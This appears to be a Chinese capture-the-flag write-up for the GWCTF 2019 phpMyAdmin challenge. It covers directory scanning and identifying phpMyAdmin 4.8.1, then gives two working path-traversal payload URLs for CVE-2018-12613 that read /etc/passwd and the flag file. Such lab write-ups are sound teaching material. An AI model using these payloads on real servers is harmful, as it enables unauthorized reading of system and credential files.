[GWCTF 2019]我有一个数据库(特详解)

页面一开始乱码,先教大家应该修复的方法,到火狐打开,然后找到小工具里的修复文字编码,就可以了(没有的话可以在定制工具栏里添加)

[GWCTF 2019]我有一个数据库(特详解)_第1张图片

一般页面读取乱码都可以这样解决

[GWCTF 2019]我有一个数据库(特详解)_第2张图片

他说什么都没有,先dirsearch扫一下

image-20240131174605840

先看看robots.txt里又啥

[GWCTF 2019]我有一个数据库(特详解)_第3张图片

查看phpinfo.php看看

[GWCTF 2019]我有一个数据库(特详解)_第4张图片

查看其他的吧,有个数据库看看去

[GWCTF 2019]我有一个数据库(特详解)_第5张图片

在界面可以查到各服务器的版本,可以去百度各版本服务器的漏洞

[GWCTF 2019]我有一个数据库(特详解)_第6张图片

这里就不一样查了,直接上结论

查询到4.8.1版本存在任意文件读取漏洞:phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)

直接看上面那个师傅的文章,十分详细的

接下来就是利用文章里的payload了,这里../回到上一级目录,只要多于5个,能回到根目录就行,etc/passwd是linux存放用户和密码的文件,在根目录

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

image-20240131182341538

接下来就是flag了

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../flag

image-20240131182441692

你可能感兴趣的:(网络安全,linux,服务器)